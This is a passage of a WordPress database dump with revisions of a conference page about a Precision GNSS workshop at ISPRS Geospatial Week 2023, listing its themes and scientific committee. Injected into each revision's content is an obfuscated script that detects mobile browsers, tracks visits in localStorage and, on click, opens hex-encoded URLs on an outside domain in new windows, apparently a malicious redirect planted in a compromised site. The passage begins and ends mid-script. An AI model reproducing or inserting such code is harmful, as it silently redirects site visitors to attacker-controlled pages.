g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Precision GNSS: Technology Advances and Applications for Navigation and Mapping</strong>','','inherit','closed','closed','','3452-revision-v1','','','2022-12-16 14:14:55','2022-12-16 14:14:55','',3452,'https://gsw2023.com/?p=3488',0,'revision','',0),
(3489,1,'2022-12-16 14:16:18','2022-12-16 14:16:18','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3480\" img_size=\"600x600\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">The Global Navigation Satellite Systems (GNSS) have become an indispensable component for a wide range of applications. With rapid advances in GNSS system development which currently includes four operational systems and various regional augmentation systems, high accuracy is increasingly demanded by many emerging applications. For examples, within-lane autonomous vehicle control requires dm or better positioning accuracy while dm accuracy is also demanded for smartphone-based navigation and mapping. Although high accuracy has been widely demonstrated, the use of low-cost GNSS receivers in mass-market applications present various challenges in order to achieve high accuracy with stringent requirements on system availability and integrity. This workshop will seek contributions that are addressing the related challenges. They can be research progress on the development of new concept, models, algorithms and systems for precise GNSS positioning (PPP, PPP-RTK, LEO etc) and integrated navigation systems (GNSS, INS, Vision etc), as well as novel applications to navigation and mapping including application system design, implementation, prototype, product and testing results.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"default_button\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"64\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"color: cyan;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6>Mathematical models and algorithms for precision GNSS</h6>\n</li>\n<li>\n<h6>Precise GNSS positioning algorithms (PPP, RTK, PPP-RTK etc)</h6>\n</li>\n<li>\n<h6>GNSS integrity monitoring and quality control algorithms</h6>\n</li>\n<li>\n<h6>GNSS augmentation algorithms and systems</h6>\n</li>\n<li>\n<h6>LEO-based satellite navigation and augmentation systems</h6>\n</li>\n<li>\n<h6>Atmospheric augmentation corrections for precision GNSS</h6>\n</li>\n<li>\n<h6>Precision GNSS with smartphones</h6>\n</li>\n<li>\n<h6>Precision GNSS with low-cost receivers</h6>\n</li>\n<li>\n<h6>Multi-sensor integrated systems (GNSS, INS, Vision etc)</h6>\n</li>\n<li>\n<h6>Precise positioning technologies in GNSS challenged environments</h6>\n</li>\n<li>\n<h6>Alternative technologies in GNSS denied environments</h6>\n</li>\n<li>\n<h6>Advanced software and hardware precision GNSS receivers</h6>\n</li>\n<li>\n<h6>Trends of future precision GNSS technology, systems and services</h6>\n</li>\n<li>\n<h6>Applications to navigation and mapping</h6>\n</li>\n</ul>\n<h6></h6>\n<p>&nbsp;</p>\n<h5 ><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6>Yang Gao, University of Calgary, Canada</h6>\n</li>\n<li>\n<h6>Xiaohong Zhang, Wuhan University, China</h6>\n</li>\n<li>\n<h6>Ahmed El-Mowafy, Curtin University, Australia</h6>\n</li>\n<li>\n<h6>OlaØvstedal, Norwegian University of Life Sciences, Norway</h6>\n</li>\n<li>\n<h6>Jacek Paziewski, University of Warmia and Mazury in Olsztyn, Poland</h6>\n</li>\n<li>\n<h6>Augusto Mazzoni, Sapienza University of Rome, Italy</h6>\n</li>\n<li>\n<h6>Washington Ochieng, Imperial College of London, UK</h6>\n</li>\n<li>\n<h6>Nobuaki Kubo, Tokyo University of Marine Science and Technology, Japan</h6>\n</li>\n<li>\n<h6>Jinling Wang, University of New South Wales, Australia</h6>\n</li>\n<li>\n<h6>Charles Toth, Ohio State University, USA</h6>\n</li>\n<li>\n<h6>Byungwoon Park, Sejong University, South Korea</h6>\n</li>\n<li>\n<h6>Maorong Ge, German Research Centre for Geosciences (GFZ), Germany</h6>\n</li>\n<li>\n<h6>Michael Fu, Google, USA</h6>\n</li>\n<li>\n<h6>Chris Rizos, University of New South Wales, Australia</h6>\n</li>\n<li>\n<h6>Sunil Bisnath, York University, Canada</h6>\n</li>\n<li>\n<h6>Galera Monico, São Paulo State University, Brazil</h6>\n</li>\n<li>\n<h6>Paul Groves, University College of London, UK</h6>\n</li>\n<li>\n<h6>George Liu, Hong Kong Polytechnic University, Hong Kong</h6>\n</li>\n<li>\n<h6>Guanwen Huang, Chang’An University, China</h6>\n</li>\n<li>\n<h6>Hongzhou Yang, University of Calgary, Canada</h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3486\" img_size=\"600x600\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Precision GNSS: Technology Advances and Applications for Navigation and Mapping</strong>','','inherit','closed','closed','','3452-revision-v1','','','2022-12-16 14:16:18','2022-12-16 14:16:18','',3452,'https://gsw2023.com/?p=3489',0,'revision','',0),
(3490,1,'2022-12-16 14:16:50','2022-12-16 14:16:50','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3480\" img_size=\"600x600\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">The Global Navigation Satellite Systems (GNSS) have become an indispensable component for a wide range of applications. With rapid advances in GNSS system development which currently includes four operational systems and various regional augmentation systems, high accuracy is increasingly demanded by many emerging applications. For examples, within-lane autonomous vehicle control requires dm or better positioning accuracy while dm accuracy is also demanded for smartphone-based navigation and mapping. Although high accuracy has been widely demonstrated, the use of low-cost GNSS receivers in mass-market applications present various challenges in order to achieve high accuracy with stringent requirements on system availability and integrity. This workshop will seek contributions that are addressing the related challenges. They can be research progress on the development of new concept, models, algorithms and systems for precise GNSS positioning (PPP, PPP-RTK, LEO etc) and integrated navigation systems (GNSS, INS, Vision etc), as well as novel applications to navigation and mapping including application system design, implementation, prototype, product and testing results.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"default_button\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"64\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"color: cyan;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6>Mathematical models and algorithms for precision GNSS</h6>\n</li>\n<li>\n<h6>Precise GNSS positioning algorithms (PPP, RTK, PPP-RTK etc)</h6>\n</li>\n<li>\n<h6>GNSS integrity monitoring and quality control algorithms</h6>\n</li>\n<li>\n<h6>GNSS augmentation algorithms and systems</h6>\n</li>\n<li>\n<h6>LEO-based satellite navigation and augmentation systems</h6>\n</li>\n<li>\n<h6>Atmospheric augmentation corrections for precision GNSS</h6>\n</li>\n<li>\n<h6>Precision GNSS with smartphones</h6>\n</li>\n<li>\n<h6>Precision GNSS with low-cost receivers</h6>\n</li>\n<li>\n<h6>Multi-sensor integrated systems (GNSS, INS, Vision etc)</h6>\n</li>\n<li>\n<h6>Precise positioning technologies in GNSS challenged environments</h6>\n</li>\n<li>\n<h6>Alternative technologies in GNSS denied environments</h6>\n</li>\n<li>\n<h6>Advanced software and hardware precision GNSS receivers</h6>\n</li>\n<li>\n<h6>Trends of future precision GNSS technology, systems and services</h6>\n</li>\n<li>\n<h6>Applications to navigation and mapping</h6>\n</li>\n</ul>\n<h6></h6>\n<p>&nbsp;</p>\n<h5 style=\"color: cyan;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6>Yang Gao, University of Calgary, Canada</h6>\n</li>\n<li>\n<h6>Xiaohong Zhang, Wuhan University, China</h6>\n</li>\n<li>\n<h6>Ahmed El-Mowafy, Curtin University, Australia</h6>\n</li>\n<li>\n<h6>OlaØvstedal, Norwegian University of Life Sciences, Norway</h6>\n</li>\n<li>\n<h6>Jacek Paziewski, University of Warmia and Mazury in Olsztyn, Poland</h6>\n</li>\n<li>\n<h6>Augusto Mazzoni, Sapienza University of Rome, Italy</h6>\n</li>\n<li>\n<h6>Washington Ochieng, Imperial College of London, UK</h6>\n</li>\n<li>\n<h6>Nobuaki Kubo, Tokyo University of Marine Science and Technology, Japan</h6>\n</li>\n<li>\n<h6>Jinling Wang, University of New South Wales, Australia</h6>\n</li>\n<li>\n<h6>Charles Toth, Ohio State University, USA</h6>\n</li>\n<li>\n<h6>Byungwoon Park, Sejong University, South Korea</h6>\n</li>\n<li>\n<h6>Maorong Ge, German Research Centre for Geosciences (GFZ), Germany</h6>\n</li>\n<li>\n<h6>Michael Fu, Google, USA</h6>\n</li>\n<li>\n<h6>Chris Rizos, University of New South Wales, Australia</h6>\n</li>\n<li>\n<h6>Sunil Bisnath, York University, Canada</h6>\n</li>\n<li>\n<h6>Galera Monico, São Paulo State University, Brazil</h6>\n</li>\n<li>\n<h6>Paul Groves, University College of London, UK</h6>\n</li>\n<li>\n<h6>George Liu, Hong Kong Polytechnic University, Hong Kong</h6>\n</li>\n<li>\n<h6>Guanwen Huang, Chang’An University, China</h6>\n</li>\n<li>\n<h6>Hongzhou Yang, University of Calgary, Canada</h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3486\" img_size=\"600x600\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\